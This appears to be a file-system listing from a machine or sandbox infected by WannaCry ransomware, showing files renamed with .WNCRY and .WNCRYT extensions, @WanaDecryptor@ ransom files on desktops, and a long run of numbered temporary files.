C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Get-NativeInstallerExitCode.ps1.WNCRY
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Set-PowerShellExitCode.ps1.WNCRYT
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Set-PowerShellExitCode.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\7zip.install\legal\VERIFICATION.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\7zip.install\legal\VERIFICATION.txt.WNCRY
C:\Users\All Users\chocolatey\lib\7zip.install\tools\chocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\7zip.install\tools\chocolateyInstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\7zip.install\tools\chocolateyUninstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\7zip.install\tools\chocolateyUninstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\chocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\chocolateyInstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\NOTICE.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\NOTICE.txt.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\VERIFICATION.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\VERIFICATION.txt.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\BoxStarter.bat.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\BoxStarter.bat.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\NOTICE.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\NOTICE.txt.WNCRY
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\VERIFICATION.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\VERIFICATION.txt.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\NOTICE.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\NOTICE.txt.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\VERIFICATION.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\VERIFICATION.txt.WNCRY
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\NOTICE.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\NOTICE.txt.WNCRY
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\VERIFICATION.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\VERIFICATION.txt.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\NOTICE.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\NOTICE.txt.WNCRY
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\VERIFICATION.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\VERIFICATION.txt.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Get-DefaultChocolateyLocalFilePath.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Get-DefaultChocolateyLocalFilePath.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Get-NativeInstallerExitCode.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Get-NativeInstallerExitCode.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Set-PowerShellExitCode.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Set-PowerShellExitCode.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Get-NativeInstallerExitCode.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Get-NativeInstallerExitCode.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Set-PowerShellExitCode.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Set-PowerShellExitCode.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\dotnet-5.0-runtime\tools\data.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\dotnet-5.0-runtime\tools\data.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\dotnet-6.0-runtime\tools\data.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\dotnet-6.0-runtime\tools\data.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\dotnetfx\tools\ChocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\dotnetfx\tools\ChocolateyInstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\KB3033929\Tools\ChocolateyInstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\KB3033929\Tools\ChocolateyInstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\OfficeProPlus2013\tools\chocolateyinstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\OfficeProPlus2013\tools\chocolateyinstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\openjdk\tools\chocolateyBeforeModify.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\openjdk\tools\chocolateyBeforeModify.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\openjdk\tools\chocolateyinstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\openjdk\tools\chocolateyinstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\openjdk\tools\chocolateyuninstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\openjdk\tools\chocolateyuninstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\python3\legal\VERIFICATION.txt.WNCRYT
C:\Users\All Users\chocolatey\lib\python3\legal\VERIFICATION.txt.WNCRY
C:\Users\All Users\chocolatey\lib\tapwindows\tools\chocolateyinstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\tapwindows\tools\chocolateyinstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\tapwindows\tools\chocolateyuninstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\tapwindows\tools\chocolateyuninstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\vcredist140\tools\data.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\vcredist140\tools\data.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\winrar\tools\chocolateyUninstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\winrar\tools\chocolateyUninstall.ps1.WNCRY
C:\Users\All Users\chocolatey\lib\winrar\tools\helpers.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib\winrar\tools\helpers.ps1.WNCRY
C:\Users\All Users\chocolatey\lib-bad\adobereader\tools\chocolateyuninstall.ps1.WNCRYT
C:\Users\All Users\chocolatey\lib-bad\adobereader\tools\chocolateyuninstall.ps1.WNCRY
C:\Users\All Users\chocolatey\tools\checksum.license.txt.WNCRYT
C:\Users\All Users\chocolatey\tools\checksum.license.txt.WNCRY
C:\Users\user\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt.WNCRYT
C:\Users\user\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt.WNCRY
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\chrome_shutdown_ms.txt.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\chrome_shutdown_ms.txt.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrivePersonal.cmd.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrivePersonal.cmd.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\errorIcon.svg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\errorIcon.svg.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\folder.svg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\folder.svg.WNCRY
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\loading.svg.WNCRYT
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\loading.svg.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1024.db.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1024.db.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db.WNCRY
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db.WNCRYT
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\0YHW5220.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\0YHW5220.txt.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\4GSWQ8EN.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\4GSWQ8EN.txt.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\AJGBO9CI.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\AJGBO9CI.txt.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\CAP0QFT4.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\CAP0QFT4.txt.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\CJNGZV8R.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\CJNGZV8R.txt.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\ERX8C8MI.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\ERX8C8MI.txt.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\F003S46Q.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\F003S46Q.txt.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\H6EPX8R1.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\H6EPX8R1.txt.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\J29G05RA.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\J29G05RA.txt.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\J52208RT.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\J52208RT.txt.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\MIYBJCU5.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\MIYBJCU5.txt.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\NFUEBPFN.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\NFUEBPFN.txt.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\U7UAY5KN.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\U7UAY5KN.txt.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\UKC8F8RG.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\UKC8F8RG.txt.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\VGVG2939.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\VGVG2939.txt.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\WFG456IG.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\WFG456IG.txt.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\X8F9LSJ0.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\X8F9LSJ0.txt.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\YM639DI1.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\YM639DI1.txt.WNCRY
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\YX6BCVUK.txt.WNCRYT
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\YX6BCVUK.txt.WNCRY
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\AlternateServices.txt.WNCRYT
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\AlternateServices.txt.WNCRY
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\pkcs11.txt.WNCRYT
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\pkcs11.txt.WNCRY
C:\ba69bdf0a250e352360c33\netfx_Full.mzz.WNCRYT
C:\ba69bdf0a250e352360c33\netfx_Full.mzz.WNCRY
C:\Users\All Users\Desktop\@WanaDecryptor@.bmp
C:\Users\All Users\Desktop\@WanaDecryptor@.exe
C:\Users\Default\Desktop\@WanaDecryptor@.bmp
C:\Users\Default\Desktop\@WanaDecryptor@.exe
C:\Users\Default User\Desktop\@WanaDecryptor@.bmp
C:\Users\Default User\Desktop\@WanaDecryptor@.exe
C:\Users\Public\Desktop\@WanaDecryptor@.bmp
C:\Users\Public\Desktop\@WanaDecryptor@.exe
C:\Users\user\Desktop\@WanaDecryptor@.bmp
C:\Users\user\Desktop\@WanaDecryptor@.exe
C:\Users\user\AppData\Local\Temp\hibsys.WNCRYT
C:\Users\user\AppData\Local\Temp\0.WNCRYT
C:\Users\user\AppData\Local\Temp\1.WNCRYT
C:\Users\user\AppData\Local\Temp\2.WNCRYT
C:\Users\user\AppData\Local\Temp\3.WNCRYT
C:\Users\user\AppData\Local\Temp\4.WNCRYT
C:\Users\user\AppData\Local\Temp\5.WNCRYT
C:\Users\user\AppData\Local\Temp\6.WNCRYT
C:\Users\user\AppData\Local\Temp\7.WNCRYT
C:\Users\user\AppData\Local\Temp\8.WNCRYT
C:\Users\user\AppData\Local\Temp\9.WNCRYT
C:\Users\user\AppData\Local\Temp\10.WNCRYT
C:\Users\user\AppData\Local\Temp\11.WNCRYT
C:\Users\user\AppData\Local\Temp\12.WNCRYT
C:\Users\user\AppData\Local\Temp\13.WNCRYT
C:\Users\user\AppData\Local\Temp\14.WNCRYT
C:\Users\user\AppData\Local\Temp\15.WNCRYT
C:\Users\user\AppData\Local\Temp\16.WNCRYT
C:\Users\user\AppData\Local\Temp\17.WNCRYT
C:\Users\user\AppData\Local\Temp\18.WNCRYT
C:\Users\user\AppData\Local\Temp\19.WNCRYT
C:\Users\user\AppData\Local\Temp\20.WNCRYT
C:\Users\user\AppData\Local\Temp\21.WNCRYT
C:\Users\user\AppData\Local\Temp\22.WNCRYT
C:\Users\user\AppData\Local\Temp\23.WNCRYT
C:\Users\user\AppData\Local\Temp\24.WNCRYT
C:\Users\user\AppData\Local\Temp\25.WNCRYT
C:\Users\user\AppData\Local\Temp\26.WNCRYT
C:\Users\user\AppData\Local\Temp\27.WNCRYT
C:\Users\user\AppData\Local\Temp\28.WNCRYT
C:\Users\user\AppData\Local\Temp\29.WNCRYT
C:\Users\user\AppData\Local\Temp\30.WNCRYT
C:\Users\user\AppData\Local\Temp\31.WNCRYT
C:\Users\user\AppData\Local\Temp\32.WNCRYT
C:\Users\user\AppData\Local\Temp\33.WNCRYT
C:\Users\user\AppData\Local\Temp\34.WNCRYT
C:\Users\user\AppData\Local\Temp\35.WNCRYT
C:\Users\user\AppData\Local\Temp\36.WNCRYT
C:\Users\user\AppData\Local\Temp\37.WNCRYT
C:\Users\user\AppData\Local\Temp\38.WNCRYT
C:\Users\user\AppData\Local\Temp\39.WNCRYT
C:\Users\user\AppData\Local\Temp\40.WNCRYT
C:\Users\user\AppData\Local\Temp\41.WNCRYT
C:\Users\user\AppData\Local\Temp\42.WNCRYT
C:\Users\user\AppData\Local\Temp\43.WNCRYT
C:\Users\user\AppData\Local\Temp\44.WNCRYT
C:\Users\user\AppData\Local\Temp\45.WNCRYT
C:\Users\user\AppData\Local\Temp\46.WNCRYT
C:\Users\user\AppData\Local\Temp\47.WNCRYT
C:\Users\user\AppData\Local\Temp\48.WNCRYT
C:\Users\user\AppData\Local\Temp\49.WNCRYT
C:\Users\user\AppData\Local\Temp\50.WNCRYT
C:\Users\user\AppData\Local\Temp\51.WNCRYT
C:\Users\user\AppData\Local\Temp\52.WNCRYT
C:\Users\user\AppData\Local\Temp\53.WNCRYT
C:\Users\user\AppData\Local\Temp\54.WNCRYT
C:\Users\user\AppData\Local\Temp\55.WNCRYT
C:\Users\user\AppData\Local\Temp\56.WNCRYT
C:\Users\user\AppData\Local\Temp\57.WNCRYT
C:\Users\user\AppData\Local\Temp\58.WNCRYT
C:\Users\user\AppData\Local\Temp\59.WNCRYT
C:\Users\user\AppData\Local\Temp\60.WNCRYT
C:\Users\user\AppData\Local\Temp\61.WNCRYT
C:\Users\user\AppData\Local\Temp\62.WNCRYT
C:\Users\user\AppData\Local\Temp\63.WNCRYT
C:\Users\user\AppData\Local\Temp\64.WNCRYT
C:\Users\user\AppData\Local\Temp\65.WNCRYT
C:\Users\user\AppData\Local\Temp\66.WNCRYT
C:\Users\user\AppData\Local\Temp\67.WNCRYT
C:\Users\user\AppData\Local\Temp\68.WNCRYT
C:\Users\user\AppData\Local\Temp\69.WNCRYT
C:\Users\user\AppData\Local\Temp\70.WNCRYT
C:\Users\user\AppData\Local\Temp\71.WNCRYT
C:\Users\user\AppData\Local\Temp\72.WNCRYT
C:\Users\user\AppData\Local\Temp\73.WNCRYT
C:\Users\user\AppData\Local\Temp\74.WNCRYT
C:\Users\user\AppData\Local\Temp\75.WNCRYT
C:\Users\user\AppData\Local\Temp\76.WNCRYT
C:\Users\user\AppData\Local\Temp\77.WNCRYT
C:\Users\user\AppData\Local\Temp\78.WNCRYT
C:\Users\user\AppData\Local\Temp\79.WNCRYT
C:\Users\user\AppData\Local\Temp\80.WNCRYT
C:\Users\user\AppData\Local\Temp\81.WNCRYT
C:\Users\user\AppData\Local\Temp\82.WNCRYT
C:\Users\user\AppData\Local\Temp\83.WNCRYT
C:\Users\user\AppData\Local\Temp\84.WNCRYT
C:\Users\user\AppData\Local\Temp\85.WNCRYT
C:\Users\user\AppData\Local\Temp\86.WNCRYT
C:\Users\user\AppData\Local\Temp\87.WNCRYT
C:\Users\user\AppData\Local\Temp\88.WNCRYT
C:\Users\user\AppData\Local\Temp\89.WNCRYT
C:\Users\user\AppData\Local\Temp\90.WNCRYT
C:\Users\user\AppData\Local\Temp\91.WNCRYT
C:\Users\user\AppData\Local\Temp\92.WNCRYT
C:\Users\user\AppData\Local\Temp\93.WNCRYT
C:\Users\user\AppData\Local\Temp\94.WNCRYT
C:\Users\user\AppData\Local\Temp\95.WNCRYT
C:\Users\user\AppData\Local\Temp\96.WNCRYT
C:\Users\user\AppData\Local\Temp\97.WNCRYT
C:\Users\user\AppData\Local\Temp\98.WNCRYT
C:\Users\user\AppData\Local\Temp\99.WNCRYT
C:\Users\user\AppData\Local\Temp\100.WNCRYT
C:\Users\user\AppData\Local\Temp\101.WNCRYT
C:\Users\user\AppData\Local\Temp\102.WNCRYT
C:\Users\user\AppData\Local\Temp\103.WNCRYT
C:\Users\user\AppData\Local\Temp\104.WNCRYT
C:\Users\user\AppData\Local\Temp\105.WNCRYT
C:\Users\user\AppData\Local\Temp\106.WNCRYT
C:\Users\user\AppData\Local\Temp\107.WNCRYT
C:\Users\user\AppData\Local\Temp\108.WNCRYT
C:\Users\user\AppData\Local\Temp\109.WNCRYT
C:\Users\user\AppData\Local\Temp\110.WNCRYT
C:\Users\user\AppData\Local\Temp\111.WNCRYT
C:\Users\user\AppData\Local\Temp\112.WNCRYT
C:\Users\user\AppData\Local\Temp\113.WNCRYT
C:\Users\user\AppData\Local\Temp\114.WNCRYT
C:\Users\user\AppData\Local\Temp\115.WNCRYT
C:\Users\user\AppData\Local\Temp\116.WNCRYT
C:\Users\user\AppData\Local\Temp\117.WNCRYT
C:\Users\user\AppData\Local\Temp\118.WNCRYT
C:\Users\user\AppData\Local\Temp\119.WNCRYT
C:\Users\user\AppData\Local\Temp\120.WNCRYT
C:\Users\user\AppData\Local\Temp\121.WNCRYT
C:\Users\user\AppData\Local\Temp\122.WNCRYT
C:\Users\user\AppData\Local\Temp\123.WNCRYT
C:\Users\user\AppData\Local\Temp\124.WNCRYT
C:\Users\user\AppData\Local\Temp\125.WNCRYT
C:\Users\user\AppData\Local\Temp\126.WNCRYT
C:\Users\user\AppData\Local\Temp\127.WNCRYT
C:\Users\user\AppData\Local\Temp\128.WNCRYT
C:\Users\user\AppData\Local\Temp\129.WNCRYT
C:\Users\user\AppData\Local\Temp\130.WNCRYT
C:\Users\user\AppData\Local\Temp\131.WNCRYT
C:\Users\user\AppData\Local\Temp\132.WNCRYT
C:\Users\user\AppData\Local\Temp\133.WNCRYT
C:\Users\user\AppData\Local\Temp\134.WNCRYT
C:\Users\user\AppData\Local\Temp\135.WNCRYT
C:\Users\user\AppData\Local\Temp\136.WNCRYT
C:\Users\user\AppData\Local\Temp\137.WNCRYT
C:\Users\user\AppData\Local\Temp\138.WNCRYT
C:\Users\user\AppData\Local\Temp\139.WNCRYT
C:\Users\user\AppData\Local\Temp\140.WNCRYT
C:\Users\user\AppData\Local\Temp\141.WNCRYT
C:\Users\user\AppData\Local\Temp\142.WNCRYT
C:\Users\user\AppData\Local\Temp\143.WNCRYT
C:\Users\user\AppData\Local\Temp\144.WNCRYT
C:\Users\user\AppData\Local\Temp\145.WNCRYT
C:\Users\user\AppData\Local\Temp\146.WNCRYT
C:\Users\user\AppData\Local\Temp\147.WNCRYT
C:\Users\user\AppData\Local\Temp\148.WNCRYT
C:\Users\user\AppData\Local\Temp\149.WNCRYT
C:\Users\user\AppData\Local\Temp\150.WNCRYT
C:\Users\user\AppData\Local\Temp\151.WNCRYT
C:\Users\user\AppData\Local\Temp\152.WNCRYT
C:\Users\user\AppData\Local\Temp\153.WNCRYT
C:\Users\user\AppData\Local\Temp\154.WNCRYT
C:\Users\user\AppData\Local\Temp\155.WNCRYT
C:\Users\user\AppData\Local\Temp\156.WNCRYT
C:\Users\user\AppData\Local\Temp\157.WNCRYT
C:\Users\user\AppData\Local\Temp\158.WNCRYT
C:\Users\user\AppData\Local\Temp\159.WNCRYT
C:\Users\user\AppData\Local\Temp\160.WNCRYT
C:\Users\user\AppData\Local\Temp\161.WNCRYT
C:\Users\user\AppData\Local\Temp\162.WNCRYT
C:\Users\user\AppData\Local\Temp\163.WNCRYT
C:\Users\user\AppData\Local\Temp\164.WNCRYT
C:\Users\user\AppData\Local\Temp\165.WNCRYT
C:\Users\user\AppData\Local\Temp\166.WNCRYT
C:\Users\user\AppData\Local\Temp\167.WNCRYT
C:\Users\user\AppData\Local\Temp\168.WNCRYT
C:\Users\user\AppData\Local\Temp\169.WNCRYT
C:\Users\user\AppData\Local\Temp\170.WNCRYT
C:\Users\user\AppData\Local\Temp\171.WNCRYT
C:\Users\user\AppData\Local\Temp\172.WNCRYT
C:\Users\user\AppData\Local\Temp\173.WNCRYT
C:\Users\user\AppData\Local\Temp\174.WNCRYT
C:\Users\user\AppData\Local\Temp\175.WNCRYT
C:\Users\user\AppData\Local\Temp\176.WNCRYT
C:\Users\user\AppData\Local\Temp\177.WNCRYT
C:\Users\user\AppData\Local\Temp\178.WNCRYT
C:\Users\user\AppData\Local\Temp\179.WNCRYT
C:\Users\user\AppData\Local\Temp\180.WNCRYT
C:\Users\user\AppData\Local\Temp\181.WNCRYT
C:\Users\user\AppData\Local\Temp\182.WNCRYT
C:\Users\user\AppData\Local\Temp\183.WNCRYT
C:\Users\user\AppData\Local\Temp\184.WNCRYT
C:\Users\user\AppData\Local\Temp\185.WNCRYT
C:\Users\user\AppData\Local\Temp\186.WNCRYT
C:\Users\user\AppData\Local\Temp\187.WNCRYT
C:\Users\user\AppData\Local\Temp\188.WNCRYT
C:\Users\user\AppData\Local\Temp\189.WNCRYT
C:\Users\user\AppData\Local\Temp\190.WNCRYT
C:\Users\user\AppData\Local\Temp\191.WNCRYT
C:\Users\user\AppData\Local\Temp\192.WNCRYT
C:\Users\user\AppData\Local\Temp\193.WNCRYT
C:\Users\user\AppData\Local\Temp\194.WNCRYT
C:\Users\user\AppData\Local\Temp\195.WNCRYT
C:\Users\user\AppData\Local\Temp\196.WNCRYT
C:\Users\user\AppData\Local\Temp\197.WNCRYT
C:\Users\user\AppData\Local\Temp\198.WNCRYT
C:\Users\user\AppData\Local\Temp\199.WNCRYT
C:\Users\user\AppData\Local\Temp\200.WNCRYT
C:\Users\user\AppData\Local\Temp\201.WNCRYT
C:\Users\user\AppData\Local\Temp\202.WNCRYT
C:\Users\user\AppData\Local\Temp\203.WNCRYT
C:\Users\user\AppData\Local\Temp\204.WNCRYT
C:\Users\user\AppData\Local\Temp\205.WNCRYT
C:\Users\user\AppData\Local\Temp\206.WNCRYT
C:\Users\user\AppData\Local\Temp\207.WNCRYT
C:\Users\user\AppData\Local\Temp\208.WNCRYT
C:\Users\user\AppData\Local\Temp\209.WNCRYT
C:\Users\user\AppData\Local\Temp\210.WNCRYT
C:\Users\user\AppData\Local\Temp\211.WNCRYT
C:\Users\user\AppData\Local\Temp\212.WNCRYT
C:\Users\user\AppData\Local\Temp\213.WNCRYT
C:\Users\user\AppData\Local\Temp\214.WNCRYT
C:\Users\user\AppData\Local\Temp\215.WNCRYT
C:\Users\user\AppData\Local\Temp\216.WNCRYT
C:\Users\user\AppData\Local\Temp\217.WNCRYT
C:\Users\user\AppData\Local\Temp\218.WNCRYT
C:\Users\user\AppData\Local\Temp\219.WNCRYT
C:\Users\user\AppData\Local\Temp\220.WNCRYT
C:\Users\user\AppData\Local\Temp\221.WNCRYT
C:\Users\user\AppData\Local\Temp\222.WNCRYT
C:\Users\user\AppData\Local\Temp\223.WNCRYT
C:\Users\user\AppData\Local\Temp\224.WNCRYT
C:\Users\user\AppData\Local\Temp\225.WNCRYT
C:\Users\user\AppData\Local\Temp\226.WNCRYT
C:\Users\user\AppData\Local\Temp\227.WNCRYT
C:\Users\user\AppData\Local\Temp\228.WNCRYT
C:\Users\user\AppData\Local\Temp\229.WNCRYT
C:\Users\user\AppData\Local\Temp\230.WNCRYT
C:\Users\user\AppData\Local\Temp\231.WNCRYT
C:\Users\user\AppData\Local\Temp\232.WNCRYT
C:\Users\user\AppData\Local\Temp\233.WNCRYT
C:\Users\user\AppData\Local\Temp\234.WNCRYT
C:\Users\user\AppData\Local\Temp\235.WNCRYT
C:\Users\user\AppData\Local\Temp\236.WNCRYT
C:\Users\user\AppData\Local\Temp\237.WNCRYT
C:\Users\user\AppData\Local\Temp\238.WNCRYT
C:\Users\user\AppData\Local\Temp\239.WNCRYT
C:\Users\user\AppData\Local\Temp\240.WNCRYT
C:\Users\user\AppData\Local\Temp\241.WNCRYT
C:\Users\user\AppData\Local\Temp\242.WNCRYT
C:\Users\user\AppData\Local\Temp\243.WNCRYT
C:\Users\user\AppData\Local\Temp\244.WNCRYT
C:\Users\user\AppData\Local\Temp\245.WNCRYT
C:\Users\user\AppData\Local\Temp\246.WNCRYT
C:\Users\user\AppData\Local\Temp\247.WNCRYT
C:\Users\user\AppData\Local\Temp\248.WNCRYT
C:\Users\user\AppData\Local\Temp\249.WNCRYT
C:\Users\user\AppData\Local\Temp\250.WNCRYT
C:\Users\user\AppData\Local\Temp\251.WNCRYT
C:\Users\user\AppData\Local\Temp\252.WNCRYT
C:\Users\user\AppData\Local\Temp\253.WNCRYT
C:\Users\user\AppData\Local\Temp\254.WNCRYT
C:\Users\user\AppData\Local\Temp\255.WNCRYT
C:\Users\user\AppData\Local\Temp\256.WNCRYT
C:\Users\user\AppData\Local\Temp\257.WNCRYT
C:\Users\user\AppData\Local\Temp\258.WNCRYT
C:\Users\user\AppData\Local\Temp\259.WNCRYT
C:\Users\user\AppData\Local\Temp\260.WNCRYT
C:\Users\user\AppData\Local\Temp\261.WNCRYT
C:\Users\user\AppData\Local\Temp\262.WNCRYT
C:\Users\user\AppData\Local\Temp\263.WNCRYT
C:\Users\user\AppData\Local\Temp\264.WNCRYT
C:\Users\user\AppData\Local\Temp\265.WNCRYT
C:\Users\user\AppData\Local\Temp\266.WNCRYT
C:\Users\user\AppData\Local\Temp\267.WNCRYT
C:\Users\user\AppData\Local\Temp\268.WNCRYT
C:\Users\user\AppData\Local\Temp\269.WNCRYT
C:\Users\user\AppData\Local\Temp\270.WNCRYT
C:\Users\user\AppData\Local\Temp\271.WNCRYT
C:\Users\user\AppData\Local\Temp\272.WNCRYT
C:\Users\user\AppData\Local\Temp\273.WNCRYT
